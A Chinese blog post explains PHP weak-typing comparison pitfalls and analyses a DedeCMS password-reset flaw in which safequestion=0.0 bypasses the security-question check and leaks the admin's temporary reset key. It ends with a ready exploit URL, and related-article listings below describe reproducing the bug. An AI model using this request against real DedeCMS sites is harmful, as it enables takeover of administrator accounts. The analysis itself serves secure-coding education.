dede密码修改 php,织梦前台任意用户密码修改

最新推荐文章于 2023-12-11 17:49:56 发布
最新推荐文章于 2023-12-11 17:49:56 发布
阅读量72 收藏
点赞数
文章标签: PHP 弱类型 安全漏洞 类型转换 变量判断

### 常见的弱类型问题

#### 类型转换问题

类型转换是无法避免的问题。例如需要将GET或者是POST的参数转换为int类型,或者是两个变量不匹配的时候,PHP会自动地进行变量转换。但是PHP是一个弱类型的语言,导致在进行类型转换的时候会存在很多意想不到的问题。

#### 数学运算

当php进行一些数学计算的时候

```

var_dump(0 == '0'); // true

var_dump(0 == 'abc'); // true

var_dump(0 === 'abc'); // false

var_dump(1 == '1abc'); // true

var_dump('1e0'=='1e2'); // false

var_dump('0.0'==0); // true

var_dump('0.0'==''); //false

//还有下面这样的

if(md5('s878926199a')==0){

echo 'true';

}

?>

```

因为

md5('s878926199a')=0e545993274517709034328855841020就是0的n次方,所以还是等于0

但是要注意:

`"0e123456abc"=="0e1dddada"//false`

这种返回的是为假

#### 语句条件的松散判断

```

if (isset($_GET['which']))

{

$which = $_GET['which'];

switch ($which)

{

case 0:

case 1:

case 2:

require_once $which.'.php';

break;

}

}

?>

```

#### 函数的松散判断

```

if(strcmp('1a',1)){

echo 'test';

}

?>

var_dump(in_array("1a",

array(1,2,3)));

?>

```

In_array函数和array_search函数的问题可以在in_array函数后面加一个true选项,就能解决比如:

```

if(in_array("1a", array(1,2,3),true)){

echo 'true';

}

?>

md5()

$array1[] = array(

"foo" => "bar",

"bar" => "foo",

);

$array2 = array("foo", "bar",

"hello", "world");

var_dump(md5($array1)==

md5($array2));

//回显为true

```

#### 十六进制转换

还存在一种十六进制余字符串进行比较运算时的问题。例子如下:

```

"0x1e240"=="123456"//true

"0x1e240"==123456//true

"0x1e240"=="1e240"//false

```

当其中的一个字符串是0x开头的时候,PHP会将此字符串解析成为十进制然后再进行比较,0×1240解析成为十进制就是123456,所以与int类型和string类型的123456比较都是相等。

下面我们来看一个dedecms的弱类型安全问题。

### 漏洞分析

`dedecms/member/resetpassword.php` //75行

```

else if($dopost == "safequestion")

{

$mid = preg_replace("#[^0-9]#", "", $id);

$sql = "SELECT safequestion,safeanswer,userid,email FROM #@__member WHERE mid = '$mid'";

$row = $db->GetOne($sql);

if(empty($safequestion)) $safequestion = '';

if(empty($safeanswer)) $safeanswer = '';

if($row['safequestion'] == $safequestion && $row['safeanswer'] == $safeanswer)

{

sn($mid, $row['userid'], $row['email'], 'N');

exit();

}

else

{

ShowMsg("对不起,您的安全问题或答案回答错误","-1");

exit();

}

}

```

管理员帐号admin的`$row['safequestion']`默认是为`’0’`(字符串),所以`$safequestion`不能为空。否则不进入`$row['safequestion'] == $safequestion`。而`$_GET[‘safequestion ’]`传过来的值为字符串,当`$_GET[‘safequestion ’`]为`’0’`时进入`if(empty($safequestion))`。当`$_GET[‘safequestion ’]`为`’0.0’`时不进入`if(empty($safequestion))`,而`’0’=’0.0’`进入`if($row['safequestion'] == $safequestion && $row['safeanswer'] == $safeanswer)`,右边的`$safeanswer`本身就为空。所以不用理。

跟进函数`sn`:

```

function sn($mid,$userid,$mailto, $send = 'Y')

{

global $db;

$tptim= (60*10);

$dtime = time();

$sql = "SELECT * FROM #@__pwd_tmp WHERE mid = '$mid'";

$row = $db->GetOne($sql);

if(!is_array($row))

{

//发送新邮件;

newmail($mid,$userid,$mailto,'INSERT',$send);

}

//10分钟后可以再次发送新验证码;

elseif($dtime - $tptim > $row['mailtime'])

{

newmail($mid,$userid,$mailto,'UPDATE',$send);

}

//重新发送新的验证码确认邮件;

else

{

return ShowMsg('对不起,请10分钟后再重新申请', 'login.php');

}

}

```

这里从数据库取出来的值应该为空`$sql = "SELECT * FROM #@__pwd_tmp WHERE mid = '$mid'";`于是进入

```

if(!is_array($row))

{

//发送新邮件;

newmail($mid,$userid,$mailto,'INSERT',$send);

}

```

注意一下`$send`为`N`

我们跟进`newmail`函数:

```

function newmail($mid, $userid, $mailto, $type, $send)

{

global $db,$cfg_adminemail,$cfg_webname,$cfg_basehost,$cfg_memberurl;

$mailtime = time();

$randval = random(8);

$mailtitle = $cfg_webname.":密码修改";

$mailto = $mailto;

$headers = "From: ".$cfg_adminemail."\r\nReply-To: $cfg_adminemail";

$mailbody = "亲爱的".$userid.":\r\n您好!感谢您使用".$cfg_webname."网。\r\n".$cfg_webname."应您的要求,重新设置密码:(注:如果您没有提出申请,请检查您的信息是否泄漏。)\r\n本次临时登陆密码为:".$randval." 请于三天内登陆下面网址确认修改。\r\n".$cfg_basehost.$cfg_memberurl."/resetpassword.php?dopost=getpasswd&id=".$mid;

if($type == 'INSERT')

{

$key = md5($randval);

$sql = "INSERT INTO `#@__pwd_tmp` (`mid` ,`membername` ,`pwd` ,`mailtime`)VALUES ('$mid', '$userid', '$key', '$mailtime');";

if($db->ExecuteNoneQuery($sql))

{

if($send == 'Y')

{

sendmail($mailto,$mailtitle,$mailbody,$headers);

return ShowMsg('EMAIL修改验证码已经发送到原来的邮箱请查收', 'login.php','','5000');

} else if ($send == 'N')

{

return ShowMsg('稍后跳转到修改页', $cfg_basehost.$cfg_memberurl."/resetpassword.php?dopost=getpasswd&id=".$mid."&key=".$randval);

}

}

else

{

return ShowMsg('对不起修改失败,请联系管理员', 'login.php');

}

}

```

这里直接是对`dede_pwd_tmp`表插入临时密码,临时密码为`$randval = random(8);`是8位,但是别急。紧接着插入完成之后ShowMsg('稍后跳转到修改页', `$cfg_basehost.$cfg_memberurl."/resetpassword.php?dopost=getpasswd&id=".$mid."&key=".$randval);`也就是说在`insert`完成之后跳转把`$randval`输出到了页面。

![](https://images.seebug.org/1515580755840)

也就是这个key,这个key就是管理员的临时密码。

利用方法:

先注册一个帐号并登录,然后访问:

```

http://localhost//member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1

```

就可以发现上面那个包了

#### 结语

不要相信用户输入。应多使用===来避免弱类型安全问题.

loading-bars.svg

weixin_39833469
关注
【复现任务】织梦CMS前台任意用户密码修改漏洞简报
weixin_52852770的博客
11-29 3411
漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 DeDeCMS 前台任意用户密码修改漏洞的
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
m0_60466340的博客
11-28 3132
漏洞概述 漏洞简介 织梦内容管理系统(DedeCms),以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 DeDeCMS 前台任意用...
dede密码修改 php,dede忘记后台密码修改程序
weixin_36168972的博客
03-17 185
/**********************DedeCMS 管理员帐号重设工具.http://bbs.dedecms.com/***********************///error_reporting(E_ALL || ~E_NOTICE);require_once(dirname(__FILE__)."/include/common.inc.php");if(empty($step))...
dedecms 5.7 密码修改
weixin_30607659的博客
07-18 283
取名放在根目录下面,执行更改密码 。适用于5.7 utf_8 <?php/**********************DedeCMS 管理员帐号重设工具.资源来自:烈火下载 http://down.liehuo.net***********************///error_reporting(E_ALL || ~E_NOTICE);require_once(dirna...
【手把手教你】织梦cms任意用户密码修改实战拿flag
weixin_56077110的博客
05-05 666
【渗透测试】【手把手教你】【实战】【扫地阿姨都能学会】织梦cms任意用户密码修改实战拿flag。
小组作业:前台任意用户密码修改织梦DeDeCMS)
m0_74300881的博客
12-11 72
要把uploads里面的全部复制。复制成功后,重启Apache服务。下载好的压缩包有两个文件。
织梦cms前台任意用户密码修改
鸥鹭忘机
07-28 745
基本信息 漏洞编号:SSV-97074 实验版本:dedecms v5.3 下载地址:http://www.dedecms.com/upimg/soft/2008/DedecmsV53-UTF8-Final.tar.gz 参考文章:https://www.seebug.org/vuldb/ssvid-97074 https://blog.csdn.net/qq_51569535/article/details/109211295 https://blog.csdn.net/l1028386804/arti
织梦任意前台用户密码修改漏洞复现
qq_50034496的博客
10-22 168
标题:织梦任意前台用户密码修改漏洞复现 (DeDeCMS 前台任意用户密码修改漏洞) ps:工具:phpstudy,burp suite 1. burp suite证书到火狐 2.打开phpstudy,打开apache,mysql 3.建立一个网站,把dedecms的 uploads文件导入www文件中(根目录) 3.打开网站:注册会员 ps:不要设置密保问题!!! 4.打开burp suite ps:如果没有打开burp suite,则得不到下面第一张图的界面。 5.登录 ...
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改(漏洞复现)
m0_72827793的博客
12-03 703
打开源码目录下D:\phpstudy_pro\WWW\dedecms\include,找到dedesql.class.phpdedesqli.class.php两个php文件,用notepad++打开,然后ctrl+F寻找safeCheck,把TURE改为FALSE,关闭安全检查。就是这里的判断出现了问题,因为使用了不够严谨的 == 进行了比较,导致if语句的条件为真,就会进入分支,进入sn函数。然后放回页面,退出我们的账号,来到下面这个页面。如果他会让你下载,点击是就好!然后按着以下教程安装就好!
织梦百度小程序及微信小程序对接织梦cms数据插件
dedeliua的博客
08-06 2257
DEDECMS 小程序插件简介 互联网上有很多织梦插件,但有些依赖于第三方,有些需要某个php或sql基础,有些插件是免费的,但是需要授权只能生成一个模板式的小程序,嵌入的广告多,代码还加密,且小程序的源代码很昂贵,这也是我开发dedecms 小程序插件的一个重要原因。本小程序插件支持微信小程序API调用、百度小程序API调用。 织梦小程序插件,让您不需要有php或SQL基础,不需要依赖任何第三方网站授权,后台一次点击安装,分分钟配置完成,让您拥有真正属于您的网站的小程序! 小程序插件的主要功能如下: (1
织梦】循环调用一级二级导航且当前页顶级栏目高亮(包括首页高亮判断)
qq_26173001的博客
10-17 723
1、织梦一级菜单被点击栏目高亮调用方法 {dede:channel typeid ='1' type ='son' currentstyle="<li class='on'><a href='~typelink~'>~typename~</a></li>"} <li><a href='[field:typeurl/]'>...
基于微信小程序的新生报到系统设计与实现.docx
09-13
基于微信小程序的新生报到系统设计与实现.docx
基于java的电商平台的设计与实现.docx
09-13
基于java的电商平台的设计与实现.docx
基于java的大学生智能消费记账系统的设计与实现.docx
09-13
基于java的大学生智能消费记账系统的设计与实现.docx
基于java的植物健康系统设计与实现.docx
09-13
基于java的植物健康系统设计与实现.docx
weixin151云匹面粉直供微信小程序+springboot.rar
09-13
所有源码,都可正常运行
计算2296傅奕群.html
最新发布
09-14
计算2296傅奕群.html
基于java的手机商城设计与开发设计与实现.docx
09-13
基于java的手机商城设计与开发设计与实现.docx
dede flag php,织梦dede:list列表按flag属性调用文档
05-27
您好,我不确定您的问题是什么。但是,如果您想要按照标志(flag)属性调用文档,您可以使用如下代码: ```php <?php require_once(dirname(__FILE__).'/include/common.inc.php'); $dsql->SetQuery("SELECT * FROM `#@__archives` WHERE `flag` LIKE '%your_flag%'"); $dsql->Execute(); while($row = $dsql->GetArray()){ //在这里处理文档内容 } ?> ``` 其中,`your_flag` 是您要查询的标志(flag)属性值。这段代码将从 `#@__archives` 表中选择所有标志(flag)属性包含 `your_flag` 的文档,并将它们一一处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值